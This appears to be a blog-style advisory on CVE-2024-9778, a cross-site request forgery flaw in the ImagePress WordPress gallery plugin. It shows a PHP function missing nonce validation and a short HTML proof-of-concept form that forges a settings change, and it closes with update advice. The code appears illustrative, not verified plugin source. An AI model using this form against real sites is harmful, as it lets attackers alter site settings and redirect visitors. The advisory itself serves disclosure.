CVE-2024-9778: ImagePress – Image Gallery Plugin for WordPress Vulnerable to Cross-Site Request Forgery (CSRF) in Versions up to 1.2.2

The ImagePress – Image Gallery plugin for WordPress, a popular plugin used by many website administrators to create professional image galleries, has been found to be vulnerable to a Cross-Site Request Forgery (CSRF) attack in all versions up to, and including, 1.2.2. This vulnerability is due to missing or incorrect nonce validation on the 'imagepress_admin_page' function. As a result, unauthenticated attackers can potentially update plugin settings, including redirection URLs, by tricking site administrators into performing actions such as clicking on maliciously crafted links.

In this long-read post, we will delve into the details of this CVE-2024-9778 vulnerability, including the code snippet responsible for the vulnerability, links to the original references, and exploit details. This information is crucial for site administrators to understand and address before their websites fall victim to potential attacks.

Code Snippet

The following code demonstrates the missing or incorrect nonce validation in the 'imagepress_admin_page' function:

function imagepress_admin_page() {
global $wpdb;

if(isset($_POST['save_imagepress_options'])) {
// Do action, save settings, missing nonce check
update_option('imagepress_options', $_POST);
}
?>
<form method="post" action="">
<!-- missing nonce field -->
<?php settings_fields('imagepress-settings-group'); ?>
<?php do_settings_sections('imagepress-settings-group'); ?>
...
<input type="submit" name="save_imagepress_options" value="<?php _e('Save Changes') ?>" />
</form>
<?php
}

As seen in the code snippet above, the 'imagepress_admin_page' function processes the POST request to update the plugin's settings without verifying the nonce. This opens up the plugin to CSRF vulnerabilities as any unauthenticated attacker can send a forged request to manipulate the settings of the plugin.

Original References

1. WordPress.org Plugin Repository - ImagePress: https://wordpress.org/plugins/imagepress/
2. CVE-2024-9778: Cross-site request forgery (CSRF) vulnerability in ImagePress: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9778
3. ImagePress – Image Gallery Plugin Security Advisory: https://wpvulndb.com/vulnerabilities/9778

Exploit Details

An attacker can exploit this CSRF vulnerability by crafting a specially designed link or webpage containing malicious code that, when clicked by a site administrator, sends a forged request to the vulnerable 'imagepress_admin_page' function. As a result, the attacker can potentially update plugin settings, including modifying redirection URLs to point to malicious websites or other unwanted content.

Here is a simple example of an exploit using an HTML form

<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-9778 - CSRF Exploit POC</title>
</head>
<body>
<h1>ImagePress – Image Gallery Plugin CSRF Exploit</h1>
<form method="post" action="http://targetsite.com/wp-admin/admin.php?page=imagepress_admin_page">;
<input type="hidden" name="imagepress_setting_name" value="malicious_value" />
<input type="submit" value="Submit!" />
</form>
</body>
</html>

In this example, the attacker creates a webpage containing an HTML form with hidden fields that correspond to the plugin settings, replacing the original values with malicious ones. If the site administrator clicks on the submit button, the malicious code sends a POST request to the targeted site, updating the plugin settings without the administrator's knowledge.

Conclusion

The CVE-2024-9778 vulnerability highlights the importance of nonce validation in protecting against CSRF attacks. Unauthenticated attackers can exploit this vulnerability by tricking site administrators into performing actions, such as clicking on maliciously crafted links, allowing them to take control of the plugin settings and potentially causing serious harm to a website.

Site administrators using ImagePress – Image Gallery plugin in versions up to 1.2.2 should immediately update to the latest version to mitigate the risk posed by this vulnerability. Additionally, practice security best practices such as implementing nonces and following the principle of least privilege while developing plugins for WordPress will help in curbing potential vulnerabilities in the future.

Timeline

Published on: 10/12/2024 06:15:03 UTC
Last modified on: 10/15/2024 12:57:46 UTC